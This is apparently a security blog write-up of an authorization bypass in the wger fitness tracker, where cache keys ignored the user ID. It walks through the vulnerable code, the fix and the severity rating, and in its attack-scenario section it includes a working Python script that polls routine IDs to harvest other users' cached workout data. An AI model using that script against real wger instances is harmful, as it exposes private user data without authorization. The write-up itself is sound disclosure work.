Feb 27, 2026
The wger API cached workout routines using keys that didn't include the User ID. If User A viewed their workout, it was cached globally. User B could then request User A's workout ID, hit the cache, and receive the data without an ownership check.
A classic case of 'premature optimization' leading to security failure. In the wger fitness manager, a caching mechanism designed to speed up API responses inadvertently bypassed authorization checks. By generating cache keys based solely on the resource ID (ignoring the requesting user's identity), the application served private workout routines to unauthorized users, provided the victim had recently accessed the data.
Donald Knuth once famously said, "Premature optimization is the root of all evil." In the world of web security, I'd argue that caching is the root of about 30% of modern IDORs (Insecure Direct Object References).
Meet wger (pronounced however you like, but likely "manager" without the vowels), a popular open-source fitness tracker. It's a great tool for tracking your bench press PRs and your caloric intake. But in versions up to and including 2.4, it was also a great tool for tracking other people's bench press PRs.
The developers, in a noble attempt to make the application snappy, implemented a server-side cache for workout routines. Routines are complex objects—they have days, exercises, sets, and reps. Fetching that structure from the database every time a user taps "Start Workout" is expensive. So, they cached it. The problem? They treated the cache like a public library instead of a private locker room.
To understand this vulnerability, you have to look at the flow of a standard Django Rest Framework (DRF) request. Usually, it goes like this: Request comes in -> Auth Check -> Permission Check -> Database Lookup -> Serialization -> Response.
In wger's vulnerable endpoints (specifically structure, stats, and logs within manager/api/views.py), the flow was hijacked for speed. The application logic looked something like this:
1. Take the routine ID from the URL (say, 1337) and build a string key: routine-api-structure-1337.
2. Look that key up in the cache.
3. If the cache hits, return the cached data immediately.
4. If the cache misses, run the self.get_object() permission check, then serialize, cache, and return the result.

Do you see the massive logic gap? The permission check (which verifies "Does User B own Routine 1337?") happens in step 4. But if the cache hits in step 3, step 4 never happens. The gatekeeper is asleep because the receptionist already handed out the keys.
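Stripped of Django entirely, the gap fits in a dozen lines. The following is my own minimal simulation of the flow above (a dict standing in for the cache, invented users and data), not wger's code:

```python
# Minimal simulation of the flawed flow; names and data are invented.
cache = {}  # stands in for Django's cache backend
routines = {1337: {"owner": "user_a", "days": ["Push", "Pull", "Legs"]}}

def get_structure(requesting_user, pk):
    key = f"routine-api-structure-{pk}"  # step 1: key ignores the user
    cached = cache.get(key)              # step 2: cache lookup
    if cached is not None:
        return cached                    # step 3: hit -> return, no ownership check
    routine = routines[pk]               # step 4: miss -> only NOW check ownership
    if routine["owner"] != requesting_user:
        raise PermissionError("not your routine")
    cache[key] = routine
    return routine

get_structure("user_a", 1337)           # the owner primes the cache
leaked = get_structure("user_b", 1337)  # a stranger reads it straight from the cache
print(leaked["days"])                   # ['Push', 'Pull', 'Legs']
```

With an empty cache, the same call for user_b raises PermissionError; the check only disappears once the victim has warmed the key.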
Let's look at the actual code responsible for this. This isn't a complex buffer overflow; it's a simple logic error in Python. Here is the vulnerable pattern found in wger/manager/api/views.py:
@action(detail=True, url_path='structure')
def structure(self, request, pk):
    # VULNERABLE KEY GENERATION
    # The key is based ONLY on the primary key (pk)
    cache_key = CacheKeyMapper.routine_api_structure_key(pk)

    # CACHE LOOKUP
    cached_data = cache.get(cache_key)

    # THE BYPASS
    if cached_data is not None:
        # Returns data immediately. No ownership check.
        # No request.user check.
        return Response(cached_data)

    # SECURITY CHECK (too little, too late)
    # This only runs if the cache is empty
    instance = self.get_object()
    serializer = self.get_serializer(instance)
    data = serializer.data
    cache.set(cache_key, data, 3600)
    return Response(data)

The fix, implemented in commit e964328, was ridiculously simple: scope the key to the user. By adding the user ID to the cache key, the cache becomes private per user.
The Fix (wger/utils/cache.py):
# Old
def routine_api_structure_key(cls, pk):
    return f'routine-api-structure-{pk}'

# New
def routine_api_structure_key(cls, pk, user_id):
    return f'routine-api-structure-{user_id}-{pk}'

Now, if I request Routine 1337, the system looks for routine-api-structure-MY_ID-1337. It won't find the entry for routine-api-structure-VICTIM_ID-1337, forcing a cache miss and a subsequent permission check.
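To make the effect of the scoping concrete, here is a tiny standalone illustration (plain Python mirroring the two key builders above; the user IDs are made up):

```python
# Mirrors the old and new key builders from wger/utils/cache.py,
# stripped down to plain functions for illustration.
def old_key(pk):
    return f'routine-api-structure-{pk}'

def new_key(pk, user_id):
    return f'routine-api-structure-{user_id}-{pk}'

# Old scheme: every user maps to the SAME cache entry for a routine.
print(old_key(1337))               # routine-api-structure-1337

# New scheme: one entry per (user, routine) pair. The attacker's key
# never matches the victim's, so the attacker gets a cache miss and
# falls through to the permission check.
print(new_key(1337, user_id=42))   # routine-api-structure-42-1337
print(new_key(1337, user_id=666))  # routine-api-structure-666-1337
```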
This vulnerability has a severity score of Low (3.1), which I find amusingly optimistic. The reasoning is that the attacker cannot force the data into the cache; the victim must put it there. But in a social fitness app, users are constantly accessing their routines.
The Attack Scenario:
Recon: The attacker creates a free account on the wger instance.
Targeting: The attacker writes a script to iterate through Routine IDs (sequential integers are the bane of security). Let's say we want to spy on User ID 42.
The Campout: The script polls GET /api/v2/routine/100/structure/, 101/structure/, etc.
The Trigger: The victim walks into their gym, opens the wger app, and taps "Pull Day". The app fetches Routine 100. The server caches it as routine-api-structure-100.
The Snatch: Milliseconds later, the attacker's script requests GET /api/v2/routine/100/structure/.
The server checks: is there an entry for routine-api-structure-100? Yes. The victim's routine is served straight from the cache, with no ownership check performed.

It's a race condition where the "race" is just waiting for the victim to do what the app is designed to do.
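For the curious, the "campout" script is a handful of lines. Below is a sketch using only the standard library; the base URL, token value, header format, and polling interval are my assumptions, while the endpoint path comes from the scenario above:

```python
import json
import time
import urllib.error
import urllib.request

BASE = "https://wger.example.com"  # hypothetical target instance
TOKEN = "ATTACKER_API_TOKEN"       # the attacker's own low-privilege token

def structure_url(pk):
    # Endpoint path as described in the attack scenario.
    return f"{BASE}/api/v2/routine/{pk}/structure/"

def poll_structure(pk, attempts=10, delay=5.0):
    """Poll until the victim primes the cache, then return the leaked routine."""
    req = urllib.request.Request(
        structure_url(pk), headers={"Authorization": f"Token {TOKEN}"}
    )
    for _ in range(attempts):
        try:
            with urllib.request.urlopen(req) as resp:
                return json.load(resp)  # 200: cache hit, victim's data
        except urllib.error.HTTPError:
            time.sleep(delay)           # 403 until the cache is primed
    return None
```

Wrap `poll_structure` in a loop over candidate routine IDs and the "campout" from the scenario above is complete.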
Why does this matter? It's just pushups, right?
Not quite. The leaked endpoints (structure, stats, and logs) reveal usage patterns. If I can see your workout logs, I know when you train, how often you train, and roughly what you are physically capable of.
Furthermore, this is an unchecked read primitive. If the application logic relied on this data for other decisions, or if sensitive PII was embedded in the routine notes (e.g., "meet trainer at 5pm"), that information is compromised. It breaks the fundamental promise of multi-tenant SaaS: data isolation.
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| wger (wger-project) | <= 2.4 | 2.5 (implied post-commit) |
| Attribute | Detail |
|---|---|
| CWE | CWE-639 (Authorization Bypass Through User-Controlled Key) |
| CVSS | 3.1 (Low) |
| Attack Vector | Network (API) |
| Exploit Requirements | Authenticated, Victim Interaction (Cache Priming) |
| Privileges Required | Low (Any valid user) |
| Status | Patched |